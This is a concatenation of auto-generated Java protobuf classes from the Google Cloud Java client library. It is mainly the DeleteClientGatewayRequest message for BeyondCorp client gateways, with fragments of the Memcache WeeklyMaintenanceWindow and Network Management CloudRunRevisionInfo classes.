* </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.Duration, com.google.protobuf.Duration.Builder, com.google.protobuf.DurationOrBuilder> getDurationFieldBuilder() { if (durationBuilder_ == null) { durationBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.Duration, com.google.protobuf.Duration.Builder, com.google.protobuf.DurationOrBuilder>( getDuration(), getParentForChildren(), isClean()); duration_ = null; } return durationBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.memcache.v1.WeeklyMaintenanceWindow) } // @@protoc_insertion_point(class_scope:google.cloud.memcache.v1.WeeklyMaintenanceWindow) private static final com.google.cloud.memcache.v1.WeeklyMaintenanceWindow DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.memcache.v1.WeeklyMaintenanceWindow(); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<WeeklyMaintenanceWindow> PARSER = new com.google.protobuf.AbstractParser<WeeklyMaintenanceWindow>() { @java.lang.Override public WeeklyMaintenanceWindow parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw 
e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<WeeklyMaintenanceWindow> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<WeeklyMaintenanceWindow> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.memcache.v1.WeeklyMaintenanceWindow getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,867
java-beyondcorp-clientgateways/proto-google-cloud-beyondcorp-clientgateways-v1/src/main/java/com/google/cloud/beyondcorp/clientgateways/v1/DeleteClientGatewayRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/beyondcorp/clientgateways/v1/client_gateways_service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.beyondcorp.clientgateways.v1; /** * * * <pre> * Message for deleting a ClientGateway * </pre> * * Protobuf type {@code google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest} */ public final class DeleteClientGatewayRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest) DeleteClientGatewayRequestOrBuilder { private static final long serialVersionUID = 0L; // Use DeleteClientGatewayRequest.newBuilder() to construct. 
private DeleteClientGatewayRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private DeleteClientGatewayRequest() { name_ = ""; requestId_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new DeleteClientGatewayRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.beyondcorp.clientgateways.v1.ClientGatewaysServiceProto .internal_static_google_cloud_beyondcorp_clientgateways_v1_DeleteClientGatewayRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.beyondcorp.clientgateways.v1.ClientGatewaysServiceProto .internal_static_google_cloud_beyondcorp_clientgateways_v1_DeleteClientGatewayRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest.class, com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest.Builder.class); } public static final int NAME_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object name_ = ""; /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The name. */ @java.lang.Override public java.lang.String getName() { java.lang.Object ref = name_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); name_ = s; return s; } } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for name. 
*/ @java.lang.Override public com.google.protobuf.ByteString getNameBytes() { java.lang.Object ref = name_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); name_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int REQUEST_ID_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object requestId_ = ""; /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and t * he request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code>string request_id = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The requestId. */ @java.lang.Override public java.lang.String getRequestId() { java.lang.Object ref = requestId_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); requestId_ = s; return s; } } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. 
The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and t * he request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code>string request_id = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for requestId. */ @java.lang.Override public com.google.protobuf.ByteString getRequestIdBytes() { java.lang.Object ref = requestId_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); requestId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int VALIDATE_ONLY_FIELD_NUMBER = 3; private boolean validateOnly_ = false; /** * * * <pre> * Optional. If set, validates request by executing a dry-run which would not * alter the resource in any way. * </pre> * * <code>bool validate_only = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The validateOnly. 
*/ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(name_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, name_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(requestId_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, requestId_); } if (validateOnly_ != false) { output.writeBool(3, validateOnly_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(name_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, name_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(requestId_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, requestId_); } if (validateOnly_ != false) { size += com.google.protobuf.CodedOutputStream.computeBoolSize(3, validateOnly_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest)) { return super.equals(obj); } com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest other = (com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest) obj; if (!getName().equals(other.getName())) return false; if (!getRequestId().equals(other.getRequestId())) return false; if 
(getValidateOnly() != other.getValidateOnly()) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + NAME_FIELD_NUMBER; hash = (53 * hash) + getName().hashCode(); hash = (37 * hash) + REQUEST_ID_FIELD_NUMBER; hash = (53 * hash) + getRequestId().hashCode(); hash = (37 * hash) + VALIDATE_ONLY_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(getValidateOnly()); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static 
com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, 
extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Message for deleting a ClientGateway * </pre> * * Protobuf type {@code google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest) com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.beyondcorp.clientgateways.v1.ClientGatewaysServiceProto .internal_static_google_cloud_beyondcorp_clientgateways_v1_DeleteClientGatewayRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.beyondcorp.clientgateways.v1.ClientGatewaysServiceProto .internal_static_google_cloud_beyondcorp_clientgateways_v1_DeleteClientGatewayRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest.class, com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest.Builder .class); } // Construct using // 
com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; name_ = ""; requestId_ = ""; validateOnly_ = false; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.beyondcorp.clientgateways.v1.ClientGatewaysServiceProto .internal_static_google_cloud_beyondcorp_clientgateways_v1_DeleteClientGatewayRequest_descriptor; } @java.lang.Override public com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest getDefaultInstanceForType() { return com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest .getDefaultInstance(); } @java.lang.Override public com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest build() { com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest buildPartial() { com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest result = new com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.name_ = name_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.requestId_ = requestId_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.validateOnly_ = validateOnly_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public 
Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest) { return mergeFrom( (com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest other) { if (other == com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest .getDefaultInstance()) return this; if (!other.getName().isEmpty()) { name_ = other.name_; bitField0_ |= 0x00000001; onChanged(); } if (!other.getRequestId().isEmpty()) { requestId_ = other.requestId_; bitField0_ |= 0x00000002; onChanged(); } if (other.getValidateOnly() != false) { setValidateOnly(other.getValidateOnly()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry 
== null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { name_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { requestId_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 case 24: { validateOnly_ = input.readBool(); bitField0_ |= 0x00000004; break; } // case 24 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object name_ = ""; /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The name. */ public java.lang.String getName() { java.lang.Object ref = name_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); name_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for name. */ public com.google.protobuf.ByteString getNameBytes() { java.lang.Object ref = name_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); name_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. 
Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The name to set. * @return This builder for chaining. */ public Builder setName(java.lang.String value) { if (value == null) { throw new NullPointerException(); } name_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return This builder for chaining. */ public Builder clearName() { name_ = getDefaultInstance().getName(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The bytes for name to set. * @return This builder for chaining. */ public Builder setNameBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); name_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private java.lang.Object requestId_ = ""; /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and t * he request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. 
* * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code>string request_id = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The requestId. */ public java.lang.String getRequestId() { java.lang.Object ref = requestId_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); requestId_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and t * he request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code>string request_id = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for requestId. */ public com.google.protobuf.ByteString getRequestIdBytes() { java.lang.Object ref = requestId_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); requestId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Optional. An optional request ID to identify requests. 
Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and t * he request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code>string request_id = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The requestId to set. * @return This builder for chaining. */ public Builder setRequestId(java.lang.String value) { if (value == null) { throw new NullPointerException(); } requestId_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and t * he request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). 
* </pre> * * <code>string request_id = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearRequestId() { requestId_ = getDefaultInstance().getRequestId(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and t * he request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code>string request_id = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The bytes for requestId to set. * @return This builder for chaining. */ public Builder setRequestIdBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); requestId_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } private boolean validateOnly_; /** * * * <pre> * Optional. If set, validates request by executing a dry-run which would not * alter the resource in any way. * </pre> * * <code>bool validate_only = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } /** * * * <pre> * Optional. If set, validates request by executing a dry-run which would not * alter the resource in any way. 
* </pre> * * <code>bool validate_only = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The validateOnly to set. * @return This builder for chaining. */ public Builder setValidateOnly(boolean value) { validateOnly_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Optional. If set, validates request by executing a dry-run which would not * alter the resource in any way. * </pre> * * <code>bool validate_only = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearValidateOnly() { bitField0_ = (bitField0_ & ~0x00000004); validateOnly_ = false; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest) } // @@protoc_insertion_point(class_scope:google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest) private static final com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest(); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<DeleteClientGatewayRequest> PARSER = new com.google.protobuf.AbstractParser<DeleteClientGatewayRequest>() { @java.lang.Override public DeleteClientGatewayRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { 
Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<DeleteClientGatewayRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<DeleteClientGatewayRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,696
java-network-management/proto-google-cloud-network-management-v1beta1/src/main/java/com/google/cloud/networkmanagement/v1beta1/CloudRunRevisionInfo.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/networkmanagement/v1beta1/trace.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.networkmanagement.v1beta1; /** * * * <pre> * For display only. Metadata associated with a Cloud Run revision. * </pre> * * Protobuf type {@code google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo} */ public final class CloudRunRevisionInfo extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo) CloudRunRevisionInfoOrBuilder { private static final long serialVersionUID = 0L; // Use CloudRunRevisionInfo.newBuilder() to construct. 
